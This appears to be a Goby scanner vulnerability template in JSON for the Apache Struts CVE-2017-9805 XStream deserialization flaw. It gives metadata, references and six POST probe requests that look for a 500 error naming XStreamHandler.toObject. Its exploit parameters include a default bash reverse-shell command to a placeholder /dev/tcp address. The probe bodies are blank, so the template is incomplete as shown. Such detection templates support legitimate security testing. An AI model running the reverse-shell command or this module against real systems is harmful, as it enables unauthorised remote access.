{
"Name": "Apache Struts CVE-2017-9805 Remote Code Execution Vulnerability",
"Description": "The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads.",
"Product": "Struts2",
"Homepage": "http://struts.apache.org/",
"DisclosureDate": "2017-09-15",
"Author": "gobysec@gmail.com",
"FofaQuery": "app=\"Struts2\"",
"GobyQuery": "app=\"Struts2\"",
"Level": "3",
"Impact": "This issue may lead to Remote Code execution.",
"Recommendation": "",
"References": [
"http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html",
"http://www.securityfocus.com/bid/100609",
"http://www.securitytracker.com/id/1039263",
"https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax",
"https://bugzilla.redhat.com/show_bug.cgi?id=1488482",
"https://cwiki.apache.org/confluence/display/WW/S2-052",
"https://lgtm.com/blog/apache_struts_CVE-2017-9805",
"https://security.netapp.com/advisory/ntap-20170907-0001/",
"https://struts.apache.org/docs/s2-052.html",
"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170907-struts2",
"https://www.exploit-db.com/exploits/42627/",
"https://www.kb.cert.org/vuls/id/112992",
"https://nvd.nist.gov/vuln/detail/CVE-2017-9805",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9805"
],
"HasExp": true,
"ExpParams": [
{
"Name": "AttackType",
"Type": "select",
"Value": "goby_shell_linux,shell_cmd"
},
{
"Name": "shell_cmd",
"Type": "input",
"show": "AttackType=shell_cmd",
"Value": "bash -i >& /dev/tcp/ip/port 0>&1"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"OR",
{
"Request": {
"set_variable": ["cmd|define|text|echo asdf>asf.txt"],
"method": "POST",
"uri": "/orders",
"follow_redirect": false,
"header": {
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"Referer": "http//127.0.0.1/struts2-rest-showcase/orders.xhtml",
"Accept-Language": "zh-CN,zh;q=0.8",
"Content-Type": "application/xml",
"Cookie": "JSESSIONID=23A615808B9471F4A663C12337805003;",
"Connection": "close"
},
"data_type": "text",
"data": "\n"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "500",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "XStreamHandler.toObject",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"set_variable": ["cmd|define|text|echo asdf>asf.txt"],
"method": "POST",
"uri": "/struts2-rest-showcase/orders/3",
"follow_redirect": false,
"header": {
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"Referer": "http//127.0.0.1/struts2-rest-showcase/orders.xhtml",
"Accept-Language": "zh-CN,zh;q=0.8",
"Content-Type": "application/xml",
"Cookie": "JSESSIONID=23A615808B9471F4A663C12337805003;",
"Connection": "close"
},
"data_type": "text",
"data": "\n"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "500",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "XStreamHandler.toObject",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"set_variable": ["cmd|define|text|echo asdf>asf.txt"],
"method": "POST",
"uri": "/",
"follow_redirect": false,
"header": {
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"Referer": "http//127.0.0.1/struts2-rest-showcase/orders.xhtml",
"Accept-Language": "zh-CN,zh;q=0.8",
"Content-Type": "application/xml",
"Cookie": "JSESSIONID=23A615808B9471F4A663C12337805003;",
"Connection": "close"
},
"data_type": "text",
"data": "\n"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "500",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "XStreamHandler.toObject",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"set_variable": ["cmd|define|text|echo asdf>asf.txt"],
"method": "POST",
"uri": "/orders",
"follow_redirect": false,
"header": {
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"Referer": "http//127.0.0.1/struts2-rest-showcase/orders.xhtml",
"Accept-Language": "zh-CN,zh;q=0.8",
"Content-Type": "application/xml",
"Cookie": "JSESSIONID=23A615808B9471F4A663C12337805003;",
"Connection": "close"
},
"data_type": "text",
"data": " "
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "500",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "XStreamHandler.toObject",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"set_variable": ["cmd|define|text|echo asdf>asf.txt"],
"method": "POST",
"uri": "/struts2-rest-showcase/orders/3",
"follow_redirect": false,
"header": {
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"Referer": "http//127.0.0.1/struts2-rest-showcase/orders.xhtml",
"Accept-Language": "zh-CN,zh;q=0.8",
"Content-Type": "application/xml",
"Cookie": "JSESSIONID=23A615808B9471F4A663C12337805003;",
"Connection": "close"
},
"data_type": "text",
"data": " "
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "500",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "XStreamHandler.toObject",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"set_variable": ["cmd|define|text|echo asdf>asf.txt"],
"method": "POST",
"uri": "/",
"follow_redirect": false,
"header": {
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"Referer": "http//127.0.0.1/struts2-rest-showcase/orders.xhtml",
"Accept-Language": "zh-CN,zh;q=0.8",
"Content-Type": "application/xml",
"Cookie": "JSESSIONID=23A615808B9471F4A663C12337805003;",
"Connection": "close"
},
"data_type": "text",
"data": " "
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "500",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "XStreamHandler.toObject",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": null,
"Tags": [
"rce"
],
"CVEIDs": [
"CVE-2017-9805"
],
"CVSSScore": "8.1",
"AttackSurfaces": {
"Application": null,
"Support": ["Struts2"],
"Service": null,
"System": null,
"Hardware": null
},
"Disable": false
}